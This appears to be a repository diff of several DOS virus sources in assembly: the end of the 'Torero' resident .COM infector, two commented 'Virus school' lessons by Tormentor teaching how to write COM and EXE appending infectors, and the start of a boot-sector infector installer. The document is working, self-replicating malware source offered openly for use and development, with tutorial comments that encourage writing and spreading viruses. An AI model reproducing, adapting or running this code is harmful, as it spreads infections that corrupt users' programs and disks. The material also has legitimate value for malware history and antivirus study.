push ax bx cx dx ; Push registers, flags
|
||||
push si di ds es ; and all that shit
|
||||
|
||||
call set_int_24h ; Set int 24h
|
||||
|
||||
cmp ah,6ch ; Extended open?
|
||||
jne normal_open
|
||||
|
||||
mov dx,si ; Fix it to DS:DX
|
||||
normal_open: mov ax,3d00h ; Open the file
|
||||
call int_21h
|
||||
xchg bx,ax ; File handle in BX
|
||||
|
||||
push cs ; CS=DS
|
||||
pop ds
|
||||
|
||||
call get_sft ; Get file's SFT
|
||||
call check_mark ; Already infected?
|
||||
jae close_and_pop
|
||||
|
||||
mov byte ptr es:[di+2],2 ; Open mode=r/w
|
||||
mov ax,word ptr es:[di+28h] ; Check the extension
|
||||
cmp ax,'OC' ; of our victim
|
||||
jne close_and_pop
|
||||
|
||||
mov byte ptr cs:[infecting],1
|
||||
mov ah,3fh ; Read the first three
|
||||
mov cx,3 ; bytes to our temporal
|
||||
lea dx,header_store ; header store
|
||||
call int_21h
|
||||
|
||||
mov ax,word ptr es:[di+11h] ; File lenght in AX
|
||||
cmp ax,0ea60h ; Too big file?
|
||||
ja close_and_pop
|
||||
|
||||
push ax ; Lseek to the end of
|
||||
call lseek_end ; the file
|
||||
|
||||
mov ah,40h ; Append our k-r4d
|
||||
mov cx,torero_size ; code :)
|
||||
lea dx,torero_start
|
||||
call int_21h
|
||||
|
||||
pop ax ; Make the jmp to
|
||||
sub ax,3 ; our virus body
|
||||
mov word ptr cs:[com_header+1],ax ; for the new file
|
||||
call set_marker
|
||||
|
||||
call lseek_start ; Lseek to the start
|
||||
|
||||
mov ah,40h ; Write the new header
|
||||
mov cx,3 ; in so we'll be always
|
||||
lea dx,com_header ; executed first ;P
|
||||
call int_21h
|
||||
|
||||
mov ax,word ptr es:[di+11h] ; Actual size in AX
|
||||
sub ax,3 ; Lseek to the position
|
||||
call lseek_end ; of the original header
|
||||
|
||||
mov ah,40h ; Destroy all the info,
|
||||
mov cx,3 ; already stored in the
|
||||
lea dx,garbage ; directory entry };)
|
||||
call int_21h
|
||||
|
||||
close_and_pop: mov ah,3eh ; Close the file
|
||||
call int_21h
|
||||
|
||||
call reset_int_24h ; Reset int 24h
|
||||
|
||||
pop es ds di si ; And pop out all the
|
||||
pop dx cx bx ax ; shit we pushed b4
|
||||
popf
|
||||
ret
|
||||
|
||||
; ÄÄ´ Call to the original int 13h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
int_13h: pushf
|
||||
call dword ptr cs:[old_int_13h] ; Call the original
|
||||
ret ; int 13h
|
||||
|
||||
; ÄÄ´ Call to the original int 21h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
int_21h: pushf
|
||||
call dword ptr cs:[old_int_21h] ; Call the original
|
||||
ret ; int 21h
|
||||
|
||||
; ÄÄ´ Get SFT in ES:DI ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
get_sft: push ax bx
|
||||
mov ax,1220h ; Get job file table
|
||||
int 2fh ; in ES:DI (DOS 3+)
|
||||
jc bad_sft
|
||||
|
||||
xor bx,bx ; Get the address of
|
||||
mov ax,1216h ; the specific SFT for
|
||||
mov bl,byte ptr es:[di] ; our handle
|
||||
int 2fh
|
||||
|
||||
bad_sft: pop bx ax ; Pop registers and
|
||||
ret ; return to the code
|
||||
|
||||
; ÄÄ´ Check our infection mark ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
check_mark: cmp byte ptr es:[di+4],80h ; Compare with the min.
|
||||
ret ; value of our mark
|
||||
|
||||
; ÄÄ´ Read the directory entry ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
read_entry: push ax bx cx
|
||||
call parameters ; Load the sector
|
||||
int 25h
|
||||
|
||||
pop cx cx bx ax
|
||||
ret
|
||||
|
||||
; ÄÄ´ Sector loading ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
parameters: mov ax,word ptr es:[di+1bh] ; Load the sector
|
||||
mov word ptr cs:[control_block],ax ; number in our
|
||||
mov ax,word ptr es:[di+1dh] ; control block
|
||||
mov word ptr cs:[control_block+2],ax ; Read a long
|
||||
mov cx,0ffffh ; sector, 4 bytes
|
||||
|
||||
push cs ; CS=DS
|
||||
pop ds
|
||||
|
||||
mov word ptr cs:[control_block+4],1 ; One sector
|
||||
mov word ptr cs:[control_block+6],offset sector
|
||||
mov word ptr cs:[control_block+8],cs
|
||||
lea bx,control_block ; Control block
|
||||
|
||||
push ds si
|
||||
lds si,dword ptr es:[di+7] ; Point to the
|
||||
lodsb ; DPB
|
||||
pop si ds
|
||||
ret
|
||||
|
||||
; ÄÄ´ Point to the original header ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
point_entry: mov al,byte ptr es:[di+1fh] ; Guess the entry
|
||||
xor ah,ah
|
||||
|
||||
push cx
|
||||
mov cl,5 ; Multiply it*20h
|
||||
shl ax,cl
|
||||
pop cx
|
||||
|
||||
lea si,sector ; Calculate its offset
|
||||
add si,ax ; into the sector and
|
||||
add si,0ch ; move to si+0ch (header)
|
||||
ret
|
||||
|
||||
; ÄÄ´ Set int 24h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
set_int_24h: push ax si di
|
||||
push ds es
|
||||
|
||||
xor ax,ax ; Point to the IVT
|
||||
mov ds,ax
|
||||
|
||||
push cs ; CS=ES
|
||||
pop es
|
||||
|
||||
mov si,24h*4 ; Save the original int
|
||||
mov di,offset old_int_24h ; 24h address and set
|
||||
cld ; ours l8r
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr [si-4],offset new_int_24h
|
||||
mov word ptr [si-2],cs
|
||||
|
||||
pop es ds
|
||||
pop di si ax
|
||||
ret
|
||||
|
||||
; ÄÄ´ Restore int 24h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
reset_int_24h: push ax si di
|
||||
push ds es
|
||||
|
||||
xor ax,ax ; Point to the IVT
|
||||
mov es,ax
|
||||
|
||||
push cs ; CS=DS
|
||||
pop ds
|
||||
|
||||
mov si,offset old_int_24h ; Restore the original
|
||||
mov di,24h*4 ; int 24h address
|
||||
cld
|
||||
movsw
|
||||
movsw
|
||||
|
||||
pop es ds
|
||||
pop di si ax
|
||||
ret
|
||||
|
||||
; ÄÄ´ Torero's int 24h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
new_int_24h: mov al,3 ; Pass the error code
|
||||
iret
|
||||
|
||||
old_int_24h: dw ?,? ; Original int 24h
|
||||
|
||||
; ÄÄ´ Set our infection mark ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
set_marker: mov byte ptr es:[di+4],80h ; Attribute bit 8
|
||||
ret
|
||||
|
||||
; ÄÄ´ Lseek to the start of the file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
lseek_start: mov word ptr es:[di+15h],0 ; Read pointer=0
|
||||
ret
|
||||
|
||||
; ÄÄ´ Lseek to the end of the file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
lseek_end: mov word ptr es:[di+15h],ax ; Read pointer=file
|
||||
ret ; length (EOF)
|
||||
|
||||
; ÄÄ´ Open the host we're being executed from ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
open_host: mov ah,62h ; Get PSP address
|
||||
int 21h
|
||||
|
||||
push es
|
||||
mov ds,bx
|
||||
mov bx,word ptr ds:[2ch] ; DS:2ch=PSP segment
|
||||
mov es,bx
|
||||
xor di,di
|
||||
|
||||
mov al,1 ; Look for 01h (the
|
||||
mov cx,0ffffh ; mark which sepparates
|
||||
repnz scasb ; the path from the
|
||||
jnz emergency ; name of the file that
|
||||
; is being executed)
|
||||
xor al,al
|
||||
scasb
|
||||
|
||||
push es
|
||||
pop ds es
|
||||
|
||||
mov ah,3dh ; Open the host
|
||||
mov dx,di
|
||||
call int_21h
|
||||
xchg bx,ax ; Pass handle to BX
|
||||
ret ; and return
|
||||
|
||||
; ÄÄ´ Emergency routine... data lost! ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
emergency: push cs ; CS=DS
|
||||
pop ds
|
||||
|
||||
mov ah,9 ; Show the message...
|
||||
lea dx,windows ; This programs requires
|
||||
int 21h ; Microsoft Windows
|
||||
|
||||
mov ax,4c01h ; Errorlevel=01 :)
|
||||
int 21h
|
||||
|
||||
; ÄÄ´ Data area ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
sector db 200h dup (?) ; The long sector
|
||||
|
||||
control_block dd ? ; Control block
|
||||
dw ?
|
||||
garbage dd ?
|
||||
db ';)'
|
||||
|
||||
windows db 'This program requires Microsoft Windows.'
|
||||
db 0dh,0ah,'$'
|
||||
|
||||
action db ? ; Reading or writing?
|
||||
infecting db ?
|
||||
|
||||
com_header db 0e9h,?,? ; The COM header
|
||||
header_store db 3 dup (?) ; Temporal header store
|
||||
|
||||
torero_end label byte
|
||||
|
||||
torero ends
|
||||
end torero_start
|
|
@ -0,0 +1,158 @@
|
|||
;
|
||||
; Virus school, lession 1 (c) 1992 Tormentor [Demoralized Youth]
|
||||
;
|
||||
; This is the first lession on how to make an own virus.
|
||||
; Hope you'll learn something of it...
|
||||
; To be compiled with TASM 3.0 or higher.
|
||||
;
|
||||
; This virus is quite dumb and 'noisy'
|
||||
; It updates the filedate and time, changes DTA before execution causing
|
||||
; some progs to belive they are executed with parameters...
|
||||
; But this should only be a 'raw' virus that you can develop.
|
||||
; Certain program may hang, so i recommend you not to spread to geeks
|
||||
; since there is MANY better viruses to use for such nice purpose.
|
||||
;
|
||||
; If you want to conntact me or other virus-writers call me on my board:
|
||||
; Swedish Virus Laboratory +46-3191-9393
|
||||
;
|
||||
; Greetings to All virus-writers!
|
||||
;
|
||||
|
||||
|
||||
.model tiny
|
||||
.radix 16
|
||||
.code
|
||||
|
||||
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
|
||||
|
||||
org 100
|
||||
|
||||
dummy_code: db 'M' ; Mark file as infected.
|
||||
db 3 DUP(90) ; This is to simulate a infected prog.
|
||||
; Not included in virus-code.
|
||||
|
||||
Virus_Start: call where_we_are ; Now we call the next bytes, just to
|
||||
; know what address virus lies on.
|
||||
where_we_are: pop si ; Since the virus-code's address will
|
||||
; differ from victim to victim.
|
||||
; a POP SI after a call will give us the
|
||||
; address which equals to 'where_we_are'
|
||||
; Very important.
|
||||
|
||||
;-----------------------------------------------------------------------
|
||||
; Now we have to put back the original 4 bytes in the host program, so
|
||||
; we can return control to it later:
|
||||
|
||||
add si,_4first_bytes-where_we_are
|
||||
mov di,100
|
||||
cld
|
||||
movsw
|
||||
movsw
|
||||
|
||||
;------------------------------------------------------------------------
|
||||
|
||||
; We have to use SI as a reference since files differ in size thus making
|
||||
; virus to be located at different addresses.
|
||||
|
||||
sub si,_4first_bytes-Virus_Start+4
|
||||
|
||||
;------------------------------------------------------------------------
|
||||
; Now we just have to find victims, we will look for ALL .COM files in
|
||||
; the current directory.
|
||||
|
||||
mov ah,4e ; We start to look for a *.COM file
|
||||
look4victim: mov dx,offset file_match-Virus_Start
|
||||
add dx,si
|
||||
int 21
|
||||
|
||||
jc no_victim_found ; If no *.COM files was found.
|
||||
|
||||
mov ax,3d02 ; Now we open the file.
|
||||
mov dx,9e ; The found victims name is at ds:009e
|
||||
int 21 ; in DTA.
|
||||
|
||||
jc cant_open_file ; If file couldn't be open.
|
||||
|
||||
xchg ax,bx ; Save filehandle in bx
|
||||
; (we could use MOV BX,AX but we saves one byte by using xchg )
|
||||
|
||||
mov ah,3f ; Now we read the first 4 bytes
|
||||
mov cx,4 ; from the victim -> buffer
|
||||
|
||||
mov dx,offset _4first_bytes-Virus_Start
|
||||
add dx,si
|
||||
; We will then overwrite them with
|
||||
int 21 ; a JMP XXXX to virus-code at end.
|
||||
|
||||
jc read_error
|
||||
|
||||
cmp byte ptr ds:[si+_4first_bytes-Virus_Start],'M'
|
||||
jz sick_or_EXE ; Check if infected OR *.EXE
|
||||
; Almost all EXE files starts with 'M' and we mark the infected files by
|
||||
; starting with 'M' which equals to DEC BP
|
||||
; Now we just have to have one check instead of 2 (infected and *.EXE)
|
||||
|
||||
mov ax,4202 ; Position file-pointer to point at
|
||||
xor cx,cx ; End-of-File.
|
||||
xor dx,dx ; Any writing to file will now APPEND it
|
||||
int 21 ; Returns AX -> at end.
|
||||
|
||||
sub ax,4 ; Just for the JMP structure.
|
||||
|
||||
mov word ptr ds:[_4new_bytes+2],ax
|
||||
; Build new JMP XXXX to virus.
|
||||
; ( logic: JMP AX )
|
||||
|
||||
mov ah,40 ; Append file with virus code.
|
||||
mov cx,offset Virus_Lenght
|
||||
; File-size will increase with
|
||||
mov dx,si ; Virus_Lenght.
|
||||
int 21
|
||||
|
||||
jc write_error
|
||||
|
||||
mov ax,4200 ; Position file-pointer to begin of file
|
||||
xor cx,cx ; So we can change the first 3 bytes
|
||||
xor dx,dx ; to JMP to virus.
|
||||
int 21
|
||||
|
||||
mov ah,40 ; Write new 3 bytes.
|
||||
mov cx,4 ; After this, executing the file will
|
||||
mov dx,offset _4new_bytes-Virus_Start
|
||||
add dx,si
|
||||
; result in virus-code executing before
|
||||
int 21 ; original code.
|
||||
; (And more files will be infected)
|
||||
|
||||
jc write_error
|
||||
|
||||
mov ah,3e ; Close file, now file is infected.
|
||||
int 21 ; Dos function 3E (close handle)
|
||||
|
||||
Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let's
|
||||
jmp look4victim ; find another victim...
|
||||
|
||||
write_error: ; Here you can test whats went wrong.
|
||||
read_error: ; This is just for debugging purpose.
|
||||
cant_open_file: ; These entries are equal to eachother
|
||||
no_victim_found: ; but could be changed if you need to test something.
|
||||
|
||||
mov ax,100 ; Every thing is put back in memory,
|
||||
push ax ; lets us RET back to start of program
|
||||
ret ; and execute the original program.
|
||||
|
||||
notes db ' (c) 1992 Tormentor ,Swedish Virus Laboratory'
|
||||
db ' / Demoralized Youth / '
|
||||
|
||||
file_match db '*.COM',0 ; Pattern to search for.
|
||||
; Don't forget to end with 0 !
|
||||
|
||||
_4first_bytes: ret ; Here we save the 4 first org. bytes
|
||||
db 3 DUP(0)
|
||||
; We have a ret here since this file isn't a REAL infection.
|
||||
|
||||
_4new_bytes db 'M',0E9, 00, 00 ; Here we build the 4 new org. bytes
|
||||
; so our virus-code will be run first.
|
||||
Virus_End EQU $
|
||||
|
||||
end dummy_code
|
|
@ -0,0 +1,160 @@
|
|||
;
|
||||
; Virus Lession #2 'How to make a non-resident EXE infector'
|
||||
;
|
||||
; (c) 1992 Tormentor // Demoralized Youth
|
||||
;
|
||||
; Well, I had not time to comment this code as much as I wanted to,
|
||||
; but here you are.
|
||||
; What can be hard to understand is the .EXE header changes, but if
|
||||
; you look at the description on the header (ex: Norton guide Tech. Ref)
|
||||
; you'll understand...
|
||||
; Anyway, feel free to use this example and if you have any questions
|
||||
; or anything call my board: Swedish Virus Labratory +46-3191-9393
|
||||
;
|
||||
; Greetings to all virus-writers!
|
||||
;
|
||||
; /Tormentor
|
||||
;
|
||||
|
||||
|
||||
|
||||
.model tiny
|
||||
.radix 16
|
||||
.code
|
||||
|
||||
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
|
||||
|
||||
org 100
|
||||
|
||||
Virus_Start: call where_we_are
|
||||
|
||||
where_we_are: pop si
|
||||
|
||||
sub si,where_we_are-Virus_Start
|
||||
|
||||
mov ax,es
|
||||
add ax,10
|
||||
add ax,cs:[si+Exe_header-Virus_Start+16]
|
||||
push ax
|
||||
push cs:[si+Exe_header-Virus_Start+14]
|
||||
|
||||
push ds
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov ah,1a
|
||||
mov dx,offset Own_dta-Virus_Start
|
||||
add dx,si
|
||||
int 21
|
||||
|
||||
mov ah,4e ; We start to look for a *.EXE file
|
||||
look4victim: mov dx,offset file_match-Virus_Start
|
||||
add dx,si
|
||||
int 21
|
||||
|
||||
jnc cont2
|
||||
jmp no_victim_found ; If no *.EXE files was found.
|
||||
|
||||
cont2: mov ax,3d02
|
||||
mov dx,Own_dta-Virus_Start+1e
|
||||
add dx,si
|
||||
int 21
|
||||
|
||||
jnc cont1
|
||||
jmp cant_open_file
|
||||
|
||||
cont1: xchg ax,bx
|
||||
|
||||
mov ah,3f
|
||||
mov cx,1c
|
||||
mov dx,offset Exe_header-Virus_Start
|
||||
add dx,si
|
||||
int 21
|
||||
|
||||
jc read_error
|
||||
|
||||
cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
|
||||
jnz no_exe ; !!! Some EXEs starts with ZM !!!
|
||||
cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
|
||||
jz infected
|
||||
|
||||
mov ax,4202 ; Go EOF
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 21
|
||||
|
||||
push dx
|
||||
push ax
|
||||
|
||||
mov ah,40 ; Write virus to EOF.
|
||||
mov cx,Virus_Lenght
|
||||
mov dx,si
|
||||
int 21
|
||||
|
||||
mov ax,4202 ; Get NEW filelenght.
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 21
|
||||
|
||||
mov cx,200
|
||||
div cx
|
||||
inc ax
|
||||
mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
|
||||
mov word ptr ds:[Exe_header-Virus_Start+4+si],ax
|
||||
|
||||
pop ax
|
||||
pop dx
|
||||
|
||||
mov cx,10
|
||||
div cx
|
||||
sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
|
||||
mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
|
||||
mov word ptr ds:[Exe_header-Virus_Start+14+si],dx
|
||||
|
||||
mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'
|
||||
|
||||
mov ax,4200 ; Position file-pointer to begin of file
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 21
|
||||
|
||||
mov ah,40 ; Write header
|
||||
mov cx,1c
|
||||
mov dx,offset Exe_header-Virus_Start
|
||||
add dx,si
|
||||
int 21
|
||||
|
||||
jc write_error
|
||||
|
||||
no_exe:
|
||||
infected:
|
||||
mov ah,3e
|
||||
int 21
|
||||
|
||||
Sick_or_EXE: mov ah,4f
|
||||
jmp look4victim
|
||||
|
||||
write_error: ; Here you can test whats went wrong.
|
||||
read_error: ; This is just for debugging purpose.
|
||||
cant_open_file: ; These entries are equal to eachother
|
||||
no_victim_found: ; but could be changed if you need to test something.
|
||||
|
||||
pop ds
|
||||
retf
|
||||
|
||||
file_match db '*.EXE',0 ; Pattern to search for.
|
||||
; Don't forget to end with 0 !
|
||||
|
||||
Exe_header db 16 DUP(0)
|
||||
dw 0fff0 ; Adjustment just for this COM-file.
|
||||
db 4 DUP(0)
|
||||
|
||||
notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
|
||||
db 'Rather first in hell, than second in heaven.'
|
||||
|
||||
Own_Dta db 02bh DUP(0)
|
||||
|
||||
Virus_End EQU $
|
||||
|
||||
end Virus_Start
|
||||
|
|
@ -0,0 +1,543 @@
|
|||
code_seg segment
|
||||
assume cs:code_seg,ds:code_seg
|
||||
|
||||
org 100h
|
||||
|
||||
tormentor proc far
|
||||
|
||||
@disp macro string
|
||||
mov dx,offset string
|
||||
mov ah,09h
|
||||
int 21h
|
||||
endm
|
||||
|
||||
@exit macro
|
||||
mov ax,4c00h
|
||||
int 21h
|
||||
endm
|
||||
|
||||
@cls macro mode
|
||||
mov ah,00h
|
||||
mov al,mode
|
||||
int 10h
|
||||
endm
|
||||
|
||||
start: jmp main
|
||||
|
||||
boot_area dw 256 dup (0)
|
||||
boot_sec dw 512 dup (0)
|
||||
|
||||
message db "Tormentor Strain A",13,10
|
||||
db "Written by The High Evolutionary",13,10
|
||||
db "Copyright (C) 1991 by The RABID Nat'nl Development Corp."
|
||||
db 13,10,13,10
|
||||
db "Press any key to install onto media in drive A:",13,10
|
||||
db "(Or press CTRL-C to abort)$",13,10
|
||||
|
||||
paused db 13,10,13,10
|
||||
db "[Paused] Insert destination disk if desired and press",13,10
|
||||
db "any key, otherwise, press any key$",13,10
|
||||
|
||||
done db "Done!$",13,10
|
||||
|
||||
r_fail db 13,10,13,10
|
||||
db "Failed to READ in boot sector$",13,10
|
||||
|
||||
w_fail db 13,10,13,10
|
||||
db "Failed to WRITE boot sector$",13,10
|
||||
|
||||
f_infec db 13,10,13,10
|
||||
db "SHIT! We failed to write the virus code to the disk!!!$",13,10
|
||||
|
||||
r_boot db 13,10,13,10
|
||||
db "Now READING in the boot sector$",13,10
|
||||
|
||||
w_boot db 13,10,13,10
|
||||
db "Now WRITING the boot sector to track 719$",13,10
|
||||
|
||||
w_vir db 13,10,13,10
|
||||
db "Now WRITING the VIRUS to the boot sector$",13,10
|
||||
|
||||
succ db 13,10,13,10
|
||||
db "Success! We installed Tormentor onto the drive$",13,10
|
||||
|
||||
memerr db 13,10,13,10
|
||||
db "BOMB! We had a memory allocation error. Bailing out...$",13,10
|
||||
db 13,10
|
||||
|
||||
read_shit db 13,10,13,10
|
||||
db "Reading in shit via INT 25...$",13,10
|
||||
db 13,10
|
||||
|
||||
intro db "You are in Torment$",13,10
|
||||
|
||||
bootseg dw ? ; Storage segment address or mem. block
|
||||
; containing copy of boot record
|
||||
|
||||
dssave dw ? ; Storage for DS register
|
||||
;dssave dw seg group ; Storage for DS register
|
||||
|
||||
pspseg dw ? ; PSP segment storage
|
||||
|
||||
;stack segment para stack 'STACK' ; Code Segment
|
||||
;stack ends
|
||||
|
||||
;_data segment word public 'DATA' ; Data Segment
|
||||
;_data ends
|
||||
|
||||
;dgroup group data,stack ; Define segment group
|
||||
|
||||
;*****************************************************************************
|
||||
; Boot record information to infect both floppies and hard-drives
|
||||
;*****************************************************************************
|
||||
|
||||
bootrecord struc
|
||||
bootjump db 3 dup (?) ; Initial 3 byte jmp instruction
|
||||
oemstring db 8 dup (?) ; OEM version and DOS
|
||||
sectorbytes dw ? ; Bytes per sector
|
||||
clustersec db ? ; Sectors per cluster
|
||||
reservedrec dw ? ; Reserved sectors
|
||||
fatcopies db ? ; number of FAT copies
|
||||
direntries dw ? ; number of root dir entries
|
||||
totalsectors dw ? ; Total disk sectors
|
||||
mediadescrip db ? ; Media Descriptor
|
||||
fatsectors dw ? ; number of sectors occupied by 1 FAT
|
||||
tracksectors dw ? ; number of sectors per track
|
||||
heads dw ? ; number of heads
|
||||
hiddensectors dw ? ; number of hidden sectors
|
||||
bootrecord ends
|
||||
|
||||
drive db ? ; Current drive pointer
|
||||
|
||||
memalloc proc near
|
||||
|
||||
push bp ; Save base pointer
|
||||
push bx ; Save BX
|
||||
mov bp,sp ; init base pointer
|
||||
xor al,al ; Zero out AL
|
||||
mov ah,48h ; Allocate mem. function
|
||||
int 21h
|
||||
jnc end_memalloc ; exit if no error
|
||||
mov word ptr [bp],bx
|
||||
|
||||
end_memalloc:
|
||||
pop bx ; Restore BX
|
||||
pop bp ; Restore Base Pointer
|
||||
ret
|
||||
|
||||
memalloc endp
|
||||
|
||||
main:
|
||||
|
||||
get_default_drive:
|
||||
mov ah,19h
|
||||
int 21h
|
||||
mov byte ptr drive,al ; Move current drive into drive
|
||||
|
||||
|
||||
; mov ds,dssave ; Initialise DS
|
||||
; mov ax,es ; get PSP address
|
||||
; mov word ptr pspseg,ax ; and save it...
|
||||
|
||||
jmp read_boot
|
||||
|
||||
; mov bx,40h ; Allocate 1024 bytes
|
||||
; call memalloc ; Allocate BX block of memory
|
||||
; jnc read_boot
|
||||
; @disp memerr
|
||||
; jmp quit
|
||||
|
||||
read_boot:
|
||||
@disp read_shit
|
||||
mov ah,08h
|
||||
int 21h
|
||||
mov word ptr bootseg,ax
|
||||
push ax ; Save AX onto the stack
|
||||
mov al,0
|
||||
; mov al,byte ptr drive ; Move current drive into AL
|
||||
xor ah,ah ; Zero out AH
|
||||
; pop ds ; Restore Data_seg
|
||||
pushf ; Save flags
|
||||
mov dx,0 ; Read in sector 0
|
||||
mov cx,1 ; Read in 1 sector
|
||||
mov bx,offset boot_sec ; Store data at DS:boot_sec
|
||||
int 25h ; Read in the disk
|
||||
popf ; clear flags used by flags
|
||||
@disp done
|
||||
mov ah,08h
|
||||
int 21h
|
||||
; assume ds:code_seg ; Restore DS
|
||||
|
||||
begin: @cls 03
|
||||
; mov ah,00 ; Set screen
|
||||
; mov al,03 ; Set screen for 80x25 color
|
||||
; int 10h ; Call BIOS
|
||||
@disp message
|
||||
|
||||
mov ah,08h ; Wait for a keypress
|
||||
int 21h
|
||||
mov cx,3
|
||||
|
||||
read_sector:
|
||||
@disp r_boot ; Display that we are reading the
|
||||
; sector from the disk
|
||||
push cx ; Counter is pushed onto the stack
|
||||
mov ax,201h ; Read in 1 sector
|
||||
mov bx,offset boot_area ; Store it in boot_area
|
||||
mov cx,1 ; Set counter to 1
|
||||
mov dx,0 ; Set for drive 0, head 0
|
||||
int 13h ; Call BIOS
|
||||
pop cx ; Restore counter
|
||||
jnc good_read ; If there were no errors, then
|
||||
; jump to good_read
|
||||
loop read_sector ; Jump back and try reading the sector
|
||||
; again while CX>0
|
||||
@disp r_fail
|
||||
mov ax,4c00h ; Exit
|
||||
int 21h ; Call DOS
|
||||
|
||||
good_read:
|
||||
mov cx,3 ; Set counter to 3
|
||||
@disp paused ; Display message for pause
|
||||
mov ah,08h ; Wait for a key
|
||||
int 21h ; Call DOS
|
||||
|
||||
;*****************************************************************************
|
||||
; Write good sector to track 719 (Head 1, track 27, sector 9)
|
||||
;*****************************************************************************
|
||||
|
||||
write_sector:
|
||||
@disp w_boot ; Display that we are writing the
|
||||
; sector to disk
|
||||
mov ax,301h ; Set for writing the boot sector
|
||||
mov bx,offset boot_area ; Set buffer to what we read in
|
||||
; mov bx,offset infected_data
|
||||
mov cx,2709h ; Set counter to 2709h
|
||||
mov dx,100h ; Head 1, drive 0
|
||||
int 13h ; Call BIOS
|
||||
pop cx ; Restore the counter
|
||||
jnc good_write ; If we wrote the sectors allright,
|
||||
; then jump to good_write
|
||||
loop write_sector
|
||||
@disp w_fail
|
||||
mov ax,4c00h ; Exit
|
||||
int 21h ; Call DOS
|
||||
|
||||
good_write:
|
||||
mov cx,3 ; Copy 3 into CX
|
||||
@disp w_vir
|
||||
infect_floppy:
|
||||
push cx ; Push it onto the stack
|
||||
mov ax,301h ; Write 1 sector
|
||||
mov bx,offset infected_data ; Write corrupt boot sector to the
|
||||
; drive
|
||||
mov cx,1 ; Set counter to 1
|
||||
mov dx,0 ; Set for drive A:
|
||||
int 13h ; Call BIOS
|
||||
jnc good_infection ; If there are no problems, then
|
||||
; continue
|
||||
loop infect_floppy ; Otherwise, try again until CX=0
|
||||
@disp f_infec ; If CX=0, then display the message
|
||||
; and then exit
|
||||
mov ax,4c00h ; Exit
|
||||
int 21h ; Call DOS
|
||||
|
||||
good_infection:
|
||||
@disp succ
|
||||
mov ax,4c00h
|
||||
int 21h
|
||||
|
||||
;*****************************************************************************
|
||||
; The following is a copy of the infected boot sector to copy to sector 0
|
||||
;*****************************************************************************
|
||||
|
||||
infected_data db 0EBh, 34h
|
||||
nop
|
||||
dec cx
|
||||
inc dx
|
||||
dec bp
|
||||
and [bx+si],ah
|
||||
xor bp,word ptr ds:[33h]
|
||||
add al,[bp+si]
|
||||
add [bx+si],ax
|
||||
add dh,[bx+si+0]
|
||||
rol byte ptr [bp+si],1 ; Rotate
|
||||
std ; Set direction flag
|
||||
add al,[bx+si]
|
||||
or [bx+si],ax
|
||||
add al,[bx+si]
|
||||
db 19 dup (0)
|
||||
